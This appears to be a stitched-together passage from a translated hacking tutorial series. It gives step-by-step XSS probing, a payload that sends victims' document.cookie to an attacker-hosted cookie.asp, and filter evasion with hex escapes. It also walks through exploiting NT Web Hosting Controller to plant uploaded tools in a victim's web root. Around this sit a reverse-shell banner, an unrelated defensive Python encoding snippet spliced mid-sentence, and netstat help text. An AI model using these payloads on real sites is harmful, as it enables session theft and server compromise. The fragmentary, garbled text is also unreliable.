connect to [203.162.xxx.xxx] from xxx.xxx.xxx.xxx[xxx.xxx.xxx.xxx] 1125
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
Step 3 : Determine whether the site may be affected by XSS by looking at the information it returns :
For example, you see something like this :
"Your search for 'abc' did not find any items"
"Your search for 'abc' returned the following results"
"User 'abc' is not valid"
"Invalid login 'abc'"
or anything else that involves the "abc" you entered at the start, then it is 99% certain this site has XSS
Step 4 : Insert real code into the vulnerable spot :
insert this :
<script>alert('abc')</script>
into the box from before and press SUBMIT . If you then get a popup showing "abc", this site is 100% affected by XSS . But note that sometimes a website is affected by XSS and the popup still does not appear, in which case you have to VIEW SOURCES to check . When viewing the source, look for the line <script>alert('abc')</script> ; if it is there, that is XSS .
Another, more common example :
Let http://sitebiloi.com be a site affected by XSS, where we have found the vulnerable spot to be like this :
http://sitebiloi.com/?page=<script>...<script> , meaning we can insert code right in the ADDRESS bar .
I cannot cover every situation ; what you need is to understand the issue, and then you will recognize when a site is affected .
_ Exploitation :
+ Going back to the example of the site with XSS in the address bar, to get the victim's cookie we do this :
http://sitebiloi.com/index.asp?page=<script>window.open("http:// address of the Web site where we just uploaded the cookie.asp file /cookie.asp?cookie="+document.cookie)</script>
the code is then immediately inserted into the web page, and looks like this :
CODE
----------------------------------------------------------
<HTML>
<TITLE> Hello all! </TITLE>
hello
<script>window.open("address of the Web site where we just uploaded the cookie.asp file /cookie.asp?cookie="+document.cookie)</script>
...
</HTML>
-------------------------------------------------------------
With this code, the browser executes it and then sends the whole cookie to you as a .txt file, and you only need to open that file to read it .
+ So what do we do when the administrator limits intrusion by filtering out special characters ? Try replacing those characters with their encoded representations . Example :
* If the "filter" removes the 2 characters "<" and ">" :
The hacker uses "\x3c" and "\x3e" in their place and begins inserting code with
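Why stripping "<" and ">" is not enough, shown from the defender's side as an added example (not code from the original article): the filter leaves "\x3c" untouched and a JavaScript string literal turns it back into "<", whereas encoding for the output context keeps the input as data. The function names and the simplified JavaScript string model are assumptions.

```python
import html
import json
import re

def naive_filter(value):
    """The filter described above: strip "<" and ">" and nothing else."""
    return value.replace("<", "").replace(">", "")

def js_string_value(body):
    """Simplified model (assumption) of how a JS engine reads a string-literal
    body: only \\xNN, \\uNNNN and escaped punctuation are handled."""
    def unescape(m):
        esc = m.group(1)
        return chr(int(esc[1:], 16)) if len(esc) > 1 else esc
    return re.sub(r"\\(x[0-9A-Fa-f]{2}|u[0-9A-Fa-f]{4}|.)", unescape, body)

def js_literal(value):
    """Encoder for a value placed inside <script>: JSON-encode (this doubles
    backslashes), then hide the characters the HTML parser reacts to."""
    out = json.dumps(value)
    for ch in "<>&":
        out = out.replace(ch, "\\u%04x" % ord(ch))
    return out

def html_text(value):
    """Encoder for a value reflected into HTML body text or an attribute."""
    return html.escape(value, quote=True)

# Constructed input: the page's own alert('abc') probe written with \x3c / \x3e.
PROBE = r"\x3cscript\x3ealert('abc')\x3c/script\x3e"

def demo():
    filtered = naive_filter(PROBE)                    # unchanged: no literal < or >
    weak = js_string_value(filtered)                  # value held by the weak page
    safe = js_string_value(js_literal(PROBE)[1:-1])   # [1:-1] drops the quotes
    return filtered == PROBE, weak, safe
```

Marking session cookies HttpOnly also keeps them out of document.cookie, which limits what an injected script of the kind shown earlier can read.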
www.victim.com/advwebadmin/autosignup/newwebadmin.asp
( This command creates a free hosting account )
If both of the commands above work, then we can exploit them , he he .
_ How to exploit :
+ Since we can create a hosting account, we can upload files freely ; pay attention to where the files we just uploaded are stored ( by looking at the status bar ) .
+ Next is how to move that file into the directory holding the victim's home page ; by default it is located here :
C:\Program Files\Advanced Communications\NT Web Hosting Controller\web\
( You can replace C:\ with D:\ , E:\ )
+ Once the exact location is known, we look for a script to do the job for us :
http://[targethost]/admin/import/imp_rootdir.asp?result=1&www=C:\&ftp=C:\ ( path to the victim's web directory )&owwwPath=C:\&oftpPath=C:\( path to the directory we just uploaded the file to )
+ You can test whether the path of the uploaded file is correct by uploading any file a.html ; assuming it ends up at C:\Program Files\Advanced Communications\NT Web Hosting Controller\web\admin\a.html , we test it by typing the path in the URL :
www.victim/admin[avdadmin]/a.html
+ If it is indeed correct, all that remains is to upload the tools and you are done , .
---------------------------------------------------------------------------------------------
GOODLUCK!!!!!!!!!!!!!!!!!
( End of part 9 )
Article by ANHDENDAY
when you type a command you have to type it correctly ; practise being careful until it becomes a habit /
netstat -option ( to see what the options are, type netstat -help )
netstat -help
Displays protocol statistics and current TCP/IP network connections.
NETSTAT [-a] [-e] [-n] [-s] [-p proto] [-r] [interval]
-a Displays all connections and listening ports.
-e Displays Ethernet statistics. This may be combined with the -s
option.